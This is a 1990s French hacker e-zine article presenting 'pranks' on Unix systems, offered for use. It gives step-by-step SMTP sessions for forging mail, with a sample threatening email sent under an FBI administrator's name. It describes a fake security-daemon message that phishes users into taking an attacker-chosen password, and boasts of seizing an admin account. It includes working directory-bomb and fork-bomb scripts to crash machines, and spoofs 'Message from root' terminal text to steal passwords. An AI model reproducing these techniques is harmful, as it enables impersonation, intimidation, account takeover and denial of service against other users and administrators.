		       o/~ Paranoia ! o/~ Paranoia o/~
	    ---===***###>   Plaisanter sous Unix   <###***===---
			   o/~ They are Back ! o/~

	Vous vous etes toujours demand comment jouer des farces sous Unix,
comment foutres les boules a vos potes, a votre administrateur, jouer au con
avec le psyche des autres, faire du SEAO?  Eh bien voila le but de cet autre
petit ++N-Phile.  Amusez vous bien !

[ nota : tout ce qui est tap au clavier est prcd de ">>>" ]

> Mailer sous un autre nom:
  ========================
Pour cela, il faut connaitre les bases du transfer de mail.  Le mail sous Unix
est transporte de machine en machine par "sendmail" qui coute les messages des
autres mailers ou de ses clients sur le port TCP numro 25.

DaubeNet {101} grep smtp /etc/services
smtp            25/tcp          mail

Donc il suffit de se connecter la bas et de respecter le protocole SMTP
(Simple Message Transfer Protocol) plus une petite astuce pour faire un faux
mail qui pourrait venir de n'importe ou.

----------------------
DaubeNet {102} >>> telnet localhost 25
Trying 127.0.0.1...
Connected to univ-anon.fr.
Escape character is '^]'.
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:51:55 -0600
220 ESMTP spoken here
>>>help
214-Commands:
214-    HELO    EHLO    MAIL    RCPT    DATA
214-    RSET    NOOP    QUIT    HELP    VRFY
214-    EXPN    VERB
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214-    sendmail@CS.Berkeley.EDU.
214-For local information send email to Postmaster at your site.
214 End of HELP info
>>>help helo
214-HELO <hostname>
214-    Introduce yourself.
214 End of HELP info
>>>help mail
214-MAIL FROM: <sender>
214-    Specifies the sender.
214 End of HELP info
>>>help rcpt
214-RCPT TO: <recipient>
214-    Specifies the recipient.  Can be used any number of times.
214 End of HELP info
>>>help data
214-DATA
214-    Following text is collected as the message.
214-    End with a single dot.
214 End of HELP info
>>>help quit
214-QUIT
214-    Exit sendmail (SMTP).
214 End of HELP info
>>>quit
221 DaubeNet closing connection
Connection closed by foreign host.
----------------------

Voila dans l'ordre les syntaxe des commandes que l'on va utiliser poru forger
un mail.  C'est trs facile mais il y a une bidouille qu'il faut connaitre et
qui vous trahi si vous ne la connaissez pas.

----------------------
DaubeNet {103} >>> telnet localhost 25
Trying 127.0.0.1...
Connected to univ-anon.fr.
Escape character is '^]'.
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:52:53 -0600
220 ESMTP spoken here
>>>helo ducon.fbi.com
250 DaubeNet Hello univ-anon.fr [127.0.0.1], pleased to meet you
>>>mail from: root@ducon.fbi.com
250 root@ducon.fbi.com... Sender ok
>>>rcpt to: fred
250 fred... Recipient ok
>>>data
354 Enter mail, end with "." on a line by itself
>>>
>>>Please, would you stop playing with my Unix system otherwise i'll
>>>send a wet operation commando to your university.
>>>
>>>Nigel X.
>>>System Administrator at FBI Inc.
>>>root@fbi.com
>>>.
250 DAA00299 Message accepted for delivery
>>>quit
221 DaubeNet closing connection
Connection closed by foreign host.
----------------------

Haha, ca y est, on a envoy notre petite bidouille et le mec va avoir les
jetons de sa vie:

----------------------
DaubeNet {104} >>> mail
Mail version 5.5 6/1/90.  Type ? for help.
"/var/mail/fred": 1 message 1 new
>N  1 root@ducon.fbi.com    Thu Sep 15 03:55  14/508  
& >>>1
Message 1:
From root@ducon.fbi.com Thu Sep 15 03:55:03 1994
From: root@ducon.fbi.com
Apparently-To: fred                     [ * ]

Please, would you stop playing with my Unix system otherwise i'll
send a wet operation commando to your university.

Nigel X.
System Administrator at FBI Inc.
root@fbi.com

& >>>d
& >>>q
----------------------

Arghh... Vous avez vu comme moi la ligne ou j'ai mis une astrisque entre
crochets : C'est marqu: "Apparently-To: " arghhh... Ca fait vraiment pas
serieux n'est ce pas?
C'est ce qui vous trahi quand vous ne connaissez pas la bidouille.
Et en parlant de bidouille, la voici...

----------------------
DaubeNet {105} >>> telnet localhost 25
Trying 127.0.0.1...
Connected to univ-anon.fr.
Escape character is '^]'.
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:55:43 -0600
220 ESMTP spoken here
>>>helo
250 DaubeNet Hello univ-anon.fr [127.0.0.1], pleased to meet you
>>>mail from: root@fbi.com
250 root@fbi.com... Sender ok
>>>rcpt to: fred
250 fred... Recipient ok
>>>data
354 Enter mail, end with "." on a line by itself
>>>To: fred@univ-anon.fr                   [ * ]
>>>
>>>Good afternoon,
>>>
>>>        Could you please stop playing with my unix system otherwise i'll
>>>be forced to send one of our wet operations' commando to execute you.
>>>
>>>Nigel X, System Administrator at Fbi Inc.
>>>.
250 DAA00307 Message accepted for delivery
>>>quit
221 DaubeNet closing connection
Connection closed by foreign host.
----------------------

Vous regarderez attentivement la premiere ligne tape aprs le DATA.
C'est un "To: " suivi de l'adresse a qui on envoie...
Et voila le rsultat:

----------------------
DaubeNet {106} >>> mail
Mail version 5.5 6/1/90.  Type ? for help.
"/var/mail/fred": 1 message 1 new
>N  1 root@fbi.com          Thu Sep 15 03:57  14/509  
& >>>1
Message 1:
From root@fbi.com Thu Sep 15 03:57:41 1994
From: root@fbi.com
To: fred@univ-anon.fr

Good afternoon,

	Could you please stop playing with my unix system otherwise i'll
be forced to send one of our wet operations' commando to execute you.

Nigel X, System Administrator at Fbi Inc.

& >>>d
& >>>q
DaubeNet {107} exit
----------------------

C'est beau non la technique... ;)

Grace  cela vous pouvez commencer  lancer la terreur sur votre rseau.

Hacking Psychology:
==================
	Les utilisateurs sont par dfinition trs soumis (et c'est pour cela
que l'on distingue les hackers, ils refusent cette soumission.) Pour un user
lambda, tout ce qui vient du Mail est vrais, sacre et tout alors que n'importe
qui peut faire du faux mail...

	Bien sur, on peut faire des mail bombs de 800 kilo octets qui vont
completement flooder toute la boite aux lettre de votre/vos victime(s).

	Mais il y a plus interressant.
Imaginez que quelqu'un recoive un message de: security-daemon@<votre site>
disant:
-----
* This is and automated mailing : don't reply *

	We have found that your password is insecure. You should change this
otherwise your account will be disabled.

Please use the password "ItG-4v3" instead.

Thank you.
Security Daemon.
-----
Ainsi, vous pouvez donner beaucoup de passwords et ainsi controller pas mal de
comptes.  Une fois, j'ai russi mme  faire changer le mot de passe de
*l'admin* !!!!!  Quel con, il obit  des packages de scurit qu'il n'a mme
pas install.  AHahaha !

Foutre un systeme sur les genoux:
================================
Pour cela il y a des petits trucs tout con  faire si vous n'avez pas
d'accounting:
crez un petit script "toto" de ce type:
#!/bin/sh
mkdir ./-fuck
cp ./toto ./-fuck/toto
cd ./-fuck
./toto

Hehe, le truc va faire de plus en plus de directory et la machine s'arretera
par manque d'inode.

On peut aussi faire dans le meme genre un fichier "foo":
#!/bin/csh
./foo &
./foo &
./foo &

hehe, effet tout aussi garanti...

On peut mme mixer les deux !

Les messages fantomes:
=====================
	Vous savez, quand vous faites un write la personne  qui il est dstin
recoit:
Message from <luser> at/...
Ca serait marrant si vous pouviez vous faire passer pour d'autres personnes
non??
Eh bien c'est possible:
Il faut savoir comment ca marche.  Chaque utilisateur logg a au moins un
terminal.  Ce terminal est reprsent dans le systme Unix comme un nom de
priphrique du type: /dev/ttyXX ou XX est gnralement un nombre ou une lettre
et un nombre.
Bref, c'est la dessus qu'crit la commande write.
Le "msg on" ou "msg off" que l'on tape modifie simplement la protection en
criture sur ce priphrique.   Sur les anciens systme, l'appel systme
vhangup() n'xistait pas et on pouvait donc se connecter, regarder les
terminaux disponibles (nons attribus  des users donc en lecture et ecriture
pour tout le monde) et faire un cat dessus comme ceci:
$ cat >/dev/tty02
ensuite faire un control-Z pour le stopper et attendre que quelqu'un se logge
par ce terminal.
Ensuite, prparer a cot le :

Message from root at...
Veuillez changer immdiatement votre mot de passe en: "TuY5;tK"
Merci. Votre administrateur systme.
<EOT>

Fun isn't it?

S'amuser avec les mulateurs de terminaux:
=========================================
	Vous savez que par exemple zmodem envoie une chaine de caractre qui
lance automatiquement Zmodem en reception du cote de l'mulateur de terminaux.
C'est trs interressant car on peut faire appeler intempestivement Zmodem dans
l'mulateur si telle ou telle personne en message on utilise un mulateur de
terminaux.

Il suffit d'enregistrer la squence envoye par Zmodem pour dclancher l'appel
de Zmodem et hop, bienvenue en enfer !

Un petit programe fait cela entre autre dans les sessions Talk, c'est flash2.c
et son ancetre qui ne le fait pas mais est sympa: flash.c.
